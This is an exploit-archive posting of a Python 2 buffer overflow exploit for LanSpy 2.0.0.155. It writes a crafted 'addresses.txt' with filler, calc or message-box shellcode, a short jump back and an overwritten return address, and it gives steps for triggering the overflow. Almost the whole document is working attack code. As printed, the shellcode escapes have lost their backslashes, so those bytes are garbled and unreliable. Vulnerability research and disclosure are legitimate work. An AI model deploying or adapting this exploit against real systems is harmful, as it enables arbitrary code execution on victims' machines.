LanSpy 2.0.0.155 Buffer Overflow
Posted on 19 October 2016
#!/usr/bin/python
### LanSpy 2.0.0.155 - Buffer Overflow Exploit by n30m1nd ###
# Date: 2016-10-18
# Exploit Author: n30m1nd
# Vendor Homepage: www.lantricks.com
# Software Link: https://www.exploit-db.com/apps/42114d0f9e88ad76acaa0f145dabf923-lanspy_setup.exe
# Version: LanSpy 2.0.0.155
# Tested on: Tested on Win7 32bit and Win10 64 bit
#
# Platforms
# =========
# Tested on Win7 32bit and Win10 64 bit
# This exploit should work everywhere since the binary does not implement DEP nor ASLR
#
# Credits
# =======
# Shouts to hyp3rlinx for the PoC:
# https://www.exploit-db.com/exploits/38399/
# http://hyp3rlinx.altervista.org/
# And shouts to the crew at Offensive Security for their huge efforts on making
# the infosec community better
#
# How to
# ======
# * Run this python script. It will generate an "addresses.txt" file.
# * Replace this file in the root directory of your LanSpy.exe installation.
# * Run LanSpy.exe and start the scan or do so by pressing F3.
#   - You can also call LanSpy.exe from the command line like the following and
#     it will run the exploit straight away: echo n30 | C:PathToLanSpy.exe
#
# Exploit code
# ============
#
# NOTE(review): the script only produces one artifact, "addresses.txt"; the
# vulnerable component is LanSpy's parsing of that file from its own install
# directory (see "How to" above). It is written against Python 2: every
# literal below is a str and the file is opened in binary mode, which only
# type-checks on Python 2. The byte escapes of the shellcode stubs appear
# with their backslashes stripped on this page ("x31xC0...") and are
# reproduced here exactly as shown.
import struct

# 32bit Alphanum-ish shellcodes
# Bad chars detected: 00 2d 20

# MessageBoxA at => 00404D80
msgbox_shellcode = "".join([
    "x31xC0x50x68",
    "x70x77x6Ex64",
    "x54x5Fx50x57",
    "x57x50x35xC4",
    "x80x80x55x35",
    "x44xCDxC0x55",
    "x50xC3",
])

# WinExec at -> 004EC4FF
calc_shellcode = "".join([
    "x31xC0x50x68",
    "x63x61x6Cx63",
    "x54x5Fx50x57",
    "x35xC3x4ExC3",
    "x55x35x3Cx8A",
    "x8Dx55x50xC3",
])

# Change the shellcode to be used here
scde = calc_shellcode
#scde = msgbox_shellcode

# 126 are the bytes to jmp back with opcode x74x80 => ja -80h and it is where
# our shellcode resides. The total length up to the overwrite is 676 bytes,
# so the filler is everything before that 126-byte window.
junk = 'A' * (676 - 126)

# The chosen stub must fit inside the 126-byte window, otherwise it would
# run into the jump/return-address bytes appended below.
if len(scde) > 126:
    exit("[e] Shellcode is too big! Egghunter maybe? ;)")

# 0040407D => jmp ecx inside LanSpy
# Pad the stub out to the full window, then the short jump back, then the
# address of the "jmp ecx" gadget packed little-endian as the overwritten
# return address.
jecx = "".join([
    'A' * (126 - len(scde)),
    'x74x80CC',
    struct.pack('<I', 0x0040407D),
])

# Junk + Shellcode for calc + jump to our first stage jump which jumps to the
# second stage calc shellcode
payl = junk + scde + jecx

# Write the crafted input file next to the script; the user then copies it
# into the LanSpy install directory as described in "How to".
with open("addresses.txt", "wb") as f:
    f.write(payl)
    # Redundant under `with` (the context manager closes the file), kept as
    # in the original; a second close() on a closed file is a no-op.
    f.close()